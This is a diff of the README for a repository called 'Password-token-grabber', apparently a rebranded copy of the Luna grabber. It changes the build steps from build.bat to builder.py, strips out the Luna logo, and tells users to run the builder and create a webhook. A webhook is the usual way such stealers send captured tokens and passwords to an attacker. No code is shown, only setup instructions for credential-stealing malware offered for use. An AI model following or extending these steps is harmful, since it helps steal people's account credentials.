Passsword1234/Password-token-grabber/README.md

 ```
 Once you've downloaded the files extract the folder so it's no longer a .zip file.
 ```
-### 2. Open The build.bat File:
+### 2. Open The builder.py File:

 ```
 You dont need to install any modules opening this will install them for you.
-Then you can open the build.bat which will
+Then you can open the builder.py which will
-open a terminal with the luna logo.
+open a terminal with the a logo.
 Don't worry although this looks quite menacing its just aesthetic and is normal.
 ```
 ### 3. Create A Webhook: